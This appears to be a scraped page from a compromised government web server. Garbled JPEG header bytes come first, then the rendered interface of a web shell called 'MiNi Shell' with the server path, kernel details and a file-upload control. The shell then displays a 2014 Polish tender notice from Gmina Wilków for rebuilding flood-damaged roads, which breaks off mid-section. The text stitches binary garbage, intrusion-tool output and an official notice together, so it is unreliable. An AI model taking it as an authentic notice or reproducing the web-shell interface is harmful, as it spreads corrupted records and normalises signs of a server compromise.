JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140822/180297-N-2014.html

<p class="kh_header"><b>Wilków: Odbudowa dróg gminnych  zniszczonych w trakcie powodzi w 2010r.</b><br>
<b>Numer ogłoszenia: 180297 - 2014; data zamieszczenia: 22.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilków , Wilków 62A, 24-313 Wilków, woj. lubelskie, tel. 081 8281424, faks 081 8281050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkow.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa dróg gminnych  zniszczonych w trakcie powodzi w 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r.
Zadanie nr 1.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 290
 od km 0+000 do km 0+471 w miejscowości  Kłodnica , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1.Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,471km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 684,85m2.
3. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kat. II-VI na całej szerokości jezdni - z wywozem ziemi w ilości 210,16m3 na odległość 1,0km  =  971,47m2.
4. Umocnienie podłoża gruntowego geowłókniną 400 = 971,47m2.
5. Warstwy odsączające zagęszczane mechanicznie o grubości  10 cm = 971,47m2.
6. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm 
= 660,39m2.
7. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  15 cm 
= 901,24m2.
8. Oczyszczenie i skropienie - warstwy bitumiczne = 1507,20m2.
9. Nawierzchnia gruntowa naturalna - pobocza grubości  15cm = 471,00m2.
10. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu 4 cm = 1460,10m2.
11. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu 4 cm = 1413,00m2.
12. Tarcze znaków - średnie = 5szt.
13. Tarcze znaków - grupa T  =  1szt.
14. Słupki do znaków = 5 szt.
Zadanie nr 2.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 56 od km 0+000 do km 0+247 w miejscowości  Brzozowa, zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,247km.
2. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kategorii II-VI na całej szer. jezdni - z wywozem ziemi w ilości 195,65m3 na odległość 1,0km = 834,49m2.
3. Umocnienie podłoża gruntowego geowłókniną 400 = 834,49m2.
4. Warstwy odsączające zagęszczane mechanicznie o grubości  10 cm  =  834,49m2.
5. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  15cm 
= 791,09m2.
6. Oczyszczenie i skropienie - warstwy bitumiczne = 747,69m2.
7. Nawierzchnia gruntowa naturalna - pobocza  =  204,99m2.
8. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu 4 cm  =  747,69m2.
9. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu 4 cm = 722,99m2.
10. Tarcze znaków - średnie = 5szt.
11.  Tarcze znaków - grupa T  =  4szt.
12. Słupki do znaków = 5szt.
13.  Rura osłonowa na kabel teletechniczny  =  5mb.
Zadanie nr 3.
Odbudowa drogi gminnej w m. Wilków na odcinku 471,50mb
W tym:
3.1.  Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 693 od km 0+000 do km 0+468,50 w miejscowości  Wilków/ etap II -  nawierzchnia/ , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym
 = 0,4685km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 1499,20m2.
3. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  8cm 
= 1499,20m2.
4. Oczyszczenie i skropienie - warstwy bitumiczne = 1499,20m2.
5. Nawierzchnia gruntowa naturalna - pobocza grubości 15cm = 468,50m2.
6. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu   4 cm = 1452,35m2.
7. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu   4 cm  =  1405,50m2.
3.2. Włączenie do drogi powiatowej na odcinku 3,00 mb.
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,003km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 22,87m2.
3. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  8cm =22,87m2.
4. Oczyszczenie i skropienie - warstwy bitumiczne = 22,87m2.
5. Nawierzchnia gruntowa naturalna - pobocza grubości 15cm = 10,48m2.
6. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu  4 cm = 22,34m2.
7. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu  4 cm  =  21,80m2.
Zadanie nr 4.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 158 od km 0+000 do km 0+660 w miejscowości  Lubomirka , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1. Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym
 = 0,660km.
2. Wykonanie wykopu w gruntach kategorii  I-II wraz z wywozem ziemi na odległość 1,0km  = 132,00m3.
3. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kategorii  II-VI na całej szerokości jezdni  - z wywozem ziemi na odległość 1,0km = 1320m2.
4. Umocnienie podłoża gruntowego geowłókniną  400 = 1320m2.
5. Warstwy odsączające zagęszczane mechanicznie o grubości 10 cm = 1320m2.
6. Warstwy podbudowy z żużla stalowniczego 31,5 - 63 zagęszczane mechanicznie o grubości 10 cm - warstwa dolna = 1320m2.
7. Warstwy podbudowy z żużla stalowniczego  0-12 zagęszczane mechanicznie o grubości  10 cm - warstwa górna  = 1320m2.
8. Tarcze znaków - średnie  =  3szt.
9. Słupki do znaków =  3szt.       
Wymagania techniczne dotyczące  poszczególnych zadań  określają , Projekty  wykonawcze  , projekty stałej organizacji ruchu i Szczegółowe Specyfikacje Techniczne dla każdej drogi, stanowiące załączniki do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium  2. Ustala się wadium  w wysokości: 
Dla zadania nr 1  - 3 000,00 złotych - słownie: trzy tysiące złotych 00/100
Dla zadania nr 2  -  2 000,00 złotych - słownie: dwa tysiące złotych 00/100
Dla zadania nr 3  -  2 000,00 złotych - słownie: dwa tysiące złotych 00/100
Dla zadania nr 4  -  1 000,00 złotych  -  słownie: jeden tysiąc złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Obiektywne i niedyskryminacyjne określenie robót budowlanych, których dotyczy obowiązek wykazania w wykazie lub złożenia poświadczeń: Wykonawca winien udokumentować:
Dla zadania nr 1 i 2:
Wybudowanie od podstaw / w technologii podbudowa + nawierzchnia bitumiczna/ minimum 1 /jednej/  drogi  o długości  nie krótszej  jak 500mb  i wartości minimum 100 000,00 złotych.
Dla zadania nr 3:
Wykonanie nawierzchni bitumicznej na minimum 1 /jednej/ drodze o długości nie krótszej jak 500mb i wartości robót minimum 60 000,00 złotych.
Dla zadania nr 4:
Wybudowanie drogi żużlowej , lub podbudowy pod nawierzchnię bitumiczną na drodze o długości nie krótszej  jak 500mb i wartości robót minimum 60 000,00 złotych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kierownik budowy winien posiadać uprawnienia budowlane uprawniające go do kierowania robotami budowlanymi w zakresie budownictwa drogowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować sumą nie mniejszą jak:
Dla zadania  nr 1  - 150 000,00 złotych - słownie: sto pięćdziesiąt tysięcy złotych 00/100. 
Dla zadania nr 2 - 120 000,00 złotych - słownie: sto dwadzieścia tysięcy złotych 00/100
Dla zadania  nr 3  - 150 000,00 złotych - słownie: sto pięćdziesiąt tysięcy złotych 00/100. 
Dla zadania nr 4  -  80 000,00złotych - słownie: osiemdziesiąt tysięcy złotych 00/100.
Uwaga:
Wykonawca składający oddzielne oferty na kilka zadań winien dysponować kwotą nie mniejszą jak suma kwot wymagana dla poszczególnych zadań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obiektywne i niedyskryminacyjne określenie robót budowlanych, których dotyczy obowiązek wykazania w wykazie lub złożenia poświadczeń: Wykonawca winien udokumentować:
Dla zadania nr 1 i 2:
Wybudowanie od podstaw / w technologii podbudowa + nawierzchnia bitumiczna/ minimum 1 /jednej/  drogi  o długości  nie krótszej  jak 500mb  i wartości minimum 100 000,00 złotych.
Dla zadania nr 3:
Wykonanie nawierzchni bitumicznej na minimum 1 /jednej/ drodze o długości nie krótszej jak 500mb i wartości robót minimum 60 000,00 złotych.
Dla zadania nr 4:
Wybudowanie drogi żużlowej , lub podbudowy pod nawierzchnię bitumiczną na drodze o długości nie krótszej  jak 500mb i wartości robót minimum 60 000,00 złotych;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>a/ zakresu dostępnych wykonawcy zasobów innego podmiotu,  b/ sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c/ charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d/ zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Zakres ubezpieczenia polisy OC Wykonawcy winien obejmować wykonywanie robót drogowych . Suma ubezpieczenia nie mniej jak  150 000,00 złotych - słownie:  sto pięćdziesiąt tysięcy złotych 00/100.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania  istotnych zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
Zamawiający dopuszcza możliwość istotnej zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie:
1) W stosunku do zmiany terminu wykonania przedmiotu zamówienia - na pisemny wniosek Wykonawcy
a) jeżeli wystąpią warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonanie przedmiotu zamówienia
b) w przypadku wystąpienia siły wyższej uniemożliwiającej terminowe wykonanie przedmiotu zamówienia 
Za siłę wyższą uznaje się w szczególności:
- zdarzenie, które pozostaje poza kontrolą stron umowy, zdarzenie zewnętrzne, któremu nie można zapobiec lub które wyróżnia się nadzwyczajnym charakterem np. gwałtowne zjawiska przyrodnicze o charakterze katastrof oraz nadzwyczajne zaburzenia życia społecznego, w szczególności:
- wprowadzenie stanu wojennego na terenie obejmującym również miejsce wykonywania robót budowlanych, ataki  terrorystyczne,
-  katastrofy żywiołowe w szczególności huragany, trzęsienia ziemi, powódź,
- strajk z wyłączeniem strajku wewnętrznego w firmie Wykonawcy, a posiadający wpływ na realizację przedmiotu umowy,
c) jeżeli wystąpi przerwa w realizacji przedmiotu zamówienia z przyczyn nieleżących po stronie Wykonawcy.
2) W stosunku do zmiany osób odpowiedzialnych za kierowanie robotami budowlanymi oraz nadzór nad tymi robotami- zmiana osób może nastąpić, po wcześniejszej akceptacji przez Zamawiającego, pod warunkiem, że wskazane osoby będą posiadały uprawnienia tożsame      z wymaganymi przez Zamawiającego.
3) W stosunku do zmiany zgłoszonych w   formularzu ofertowym podwykonawców- pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego. 
3.Wszystkie powyższe okoliczności stanowią podstawę do dokonania istotnych zmian postanowień umowy, na które Zamawiający po dokładnym przeanalizowaniu przesłanek do zmiany może wyrazić zgodę, nie stanowią jednak zobowiązania Zamawiającego do wyrażenia takiej zgody.
4.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia zmian wynika z okoliczności wskazanych w ust. 2 lub zmiana korzystna jest dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/wilkow/index.php?id=80<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać również bezpośrednio w siedzibie zamawiającego , lub otrzymać pocztą za pobraniem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2014 godzina 10:00, miejsce: Gmina Wilków
Wilków 62A 24-313 Wilków
Pokój nr 107 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r.
Zadanie nr 1.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 290
 od km 0+000 do km 0+471 w miejscowości  Kłodnica , zniszczonej w wyniku powodzi w 2010r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 290
 od km 0+000 do km 0+471 w miejscowości  Kłodnica , zniszczonej w wyniku powodzi w 2010r.
Zakres prac obejmuje:
1.Roboty pomiarowe przy robotach drogowych dla trasy drogowej w terenie równinnym 
= 0,471km.
2. Profilowanie istniejącej podbudowy żużlowej wraz z zagęszczeniem = 684,85m2.
3. Koryta wykonywane mechanicznie głębokości  20 cm w gruncie kat. II-VI na całej szerokości jezdni - z wywozem ziemi w ilości 210,16m3 na odległość 1,0km  =  971,47m2.
4. Umocnienie podłoża gruntowego geowłókniną 400 = 971,47m2.
5. Warstwy odsączające zagęszczane mechanicznie o grubości  10 cm = 971,47m2.
6. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm 
= 660,39m2.
7. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie grubości  15 cm 
= 901,24m2.
8. Oczyszczenie i skropienie - warstwy bitumiczne = 1507,20m2.
9. Nawierzchnia gruntowa naturalna - pobocza grubości  15cm = 471,00m2.
10. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa wiążąca z AC11W grubość po zagęszczeniu 4 cm = 1460,10m2.
11. Nawierzchnia z mieszanek mineralno - asfaltowych, warstwa ścieralna z AC8S grubość po zagęszczeniu 4 cm = 1413,00m2.
12. Tarcze znaków - średnie = 5szt.
13. Tarcze znaków - grupa T  =  1szt.
14. Słupki do znaków = 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.31.00-0, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r.
Zadanie nr 2.
Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 56 od km 0+000 do km 0+247 w miejscowości  Brzozowa, zniszczonej w wyniku powodzi w 2010r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2.
